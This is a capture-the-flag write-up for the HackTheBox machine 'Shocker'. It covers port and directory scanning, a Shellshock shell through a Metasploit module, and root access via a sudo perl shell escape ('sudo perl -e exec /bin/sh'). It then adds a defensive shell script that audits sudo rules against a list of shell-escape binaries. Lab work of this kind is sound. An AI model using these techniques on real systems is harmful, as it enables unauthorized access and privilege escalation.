Shocker Write-up — HackTheBox

Initial Enumeration:

nmap -sC -sV -O -A -vv -n -Pn -oN nmap_scan.txt $IP
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
| 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk

Visiting the website:

Main Enumeration:

##dirb:
---- Scanning URL: http://shocker.htb/ ----
+ http://shocker.htb/cgi-bin/ (CODE:403|SIZE:294)
+ http://shocker.htb/index.html (CODE:200|SIZE:14)
+ http://shocker.htb/server-status (CODE:403|SIZE:299)
##dirsearch:
[05:14:56] Starting:
[05:15:04] 403 - 300B - /.htaccess.bak1
[05:15:04] 403 - 300B - /.htaccess.orig
[05:15:04] 403 - 302B - /.htaccess.sample
[05:15:04] 403 - 300B - /.htaccess.save
[05:15:04] 403 - 298B - /.htaccessBAK
[05:15:04] 403 - 298B - /.htaccessOLD
[05:15:04] 403 - 299B - /.htaccessOLD2
[05:15:04] 403 - 291B - /.html
[05:15:04] 403 - 290B - /.htm
[05:15:04] 403 - 297B - /.httr-oauth
[05:15:42] 403 - 294B - /cgi-bin/
[05:15:56] 200 - 137B - /index.html
[05:16:16] 403 - 299B - /server-status
[05:16:16] 403 - 300B - /server-status/
##gobuster 2nd run (inside /cgi-bin/, with script extensions; the 403 on the directory itself only means Apache refuses to list a ScriptAlias directory, scripts inside it are still executed when requested by name):
root@kali:/home/czar/Downloads# gobuster dir -u http://shocker.htb/cgi-bin/ -t 80 -w /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.sh
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://shocker.htb/cgi-bin/
[+] Threads: 80
[+] Wordlist: /home/czar/Downloads/HTB/tools/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,sh
[+] Timeout: 10s
===============================================================
2020/11/28 08:23:39 Starting gobuster
===============================================================
/user.sh (Status: 200)
Progress: 2076 / 220561 (0.94%)^C
[!] Keyboard interrupt detected, terminating.
===============================================================
2020/11/28 08:23:58 Finished
===============================================================

Metasploit: the Shellshock (CVE-2014-6271) module for Apache mod_cgi, exploit/multi/http/apache_mod_cgi_bash_env_exec, with TARGETURI set to /cgi-bin/user.sh, returns a shell as shelly, the user the CGI script runs as.

Getting User

shelly@Shocker:/home/shelly$ cat user.txt
cat user.txt
44d**************************bb4
shelly@Shocker:/home/shelly$

Privilege Escalation

shelly@Shocker:/home/shelly$ sudo -l
sudo -l
Matching Defaults entries for shelly on Shocker:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User shelly may run the following commands on Shocker:
(root) NOPASSWD: /usr/bin/perl
shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
# whoami && id
whoami && id
root
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
cat /root/root.txt
4fb5************************ad55
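The rule (root) NOPASSWD: /usr/bin/perl is root in all but name: any interpreter, editor or pager that can spawn a process gives the same result, so the check worth running on every box is "which sudo rules hand out such a program". The script below is an added example, not the write-up's own code: sudo_escape_rules reads `sudo -l` output and prints every program in a rule that is ALL or a well-known shell escape. ESCAPE_BINS is a short hand-picked list, not an exhaustive one, and SAMPLE_SUDO_L is the write-up's own sudo -l output plus one constructed, harmless rule to show a non-match.

```sh
#!/bin/sh
# Added example (not from the write-up): flag sudo rules that grant a program
# able to spawn a shell, such as the /usr/bin/perl rule on Shocker.

# Hand-picked subset of binaries with a known shell escape (assumption: extend as needed).
ESCAPE_BINS="perl python python3 ruby vi vim less more awk find bash sh env nmap"

# Constructed sample: the write-up's sudo -l output plus one narrow rule that
# should NOT be flagged (cat cannot spawn a shell).
SAMPLE_SUDO_L='Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl
    (root) /bin/cat /var/log/apache2/error.log'

# sudo_escape_rules: read `sudo -l` output on stdin; print, one per line, each
# program in a "(runas) [TAG:] cmd, cmd, ..." rule that is ALL or in ESCAPE_BINS.
sudo_escape_rules() {
    awk -v bins="$ESCAPE_BINS" '
    BEGIN { n = split(bins, b, " "); for (i = 1; i <= n; i++) esc[b[i]] = 1 }
    /^[ \t]*\(/ {
        line = $0
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "", line)        # drop the "(root)" / "(ALL : ALL)" runas spec
        while (match(line, /^[A-Z]+:[ \t]*/))          # drop NOPASSWD:, SETENV:, NOEXEC:, ...
            line = substr(line, RLENGTH + 1)
        n = split(line, cmds, /,[ \t]*/)               # one rule can list several commands
        for (i = 1; i <= n; i++) {
            split(cmds[i], w, /[ \t]+/)                # first word is the program, rest are args
            prog = w[1]
            if (prog == "" || substr(prog, 1, 1) == "!") continue   # skip negated entries
            base = prog
            sub(/.*\//, "", base)                      # basename
            if (prog == "ALL" || (base in esc)) print prog
        }
    }'
}

# Usage:  ./sudo_audit.sh --sample   (offline, prints /usr/bin/perl for the Shocker rule)
#         ./sudo_audit.sh --live     (on the box, audits the real `sudo -l` output)
case "${1:-}" in
    --sample) printf '%s\n' "$SAMPLE_SUDO_L" | sudo_escape_rules ;;
    --live)   sudo -n -l 2>/dev/null | sudo_escape_rules ;;
esac
```

The parser is deliberately lenient: it keys on the basename, so /usr/bin/perl, /usr/local/bin/perl and a symlink named perl all match, and args after the program are ignored because an interpreter with a fixed script argument can usually still be coaxed into a shell. The fix on the defending side is the shape of the constructed second rule: a specific, non-interpreting binary with fixed arguments, never a bare interpreter.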

Manual Exploitation:


Written by 0xczar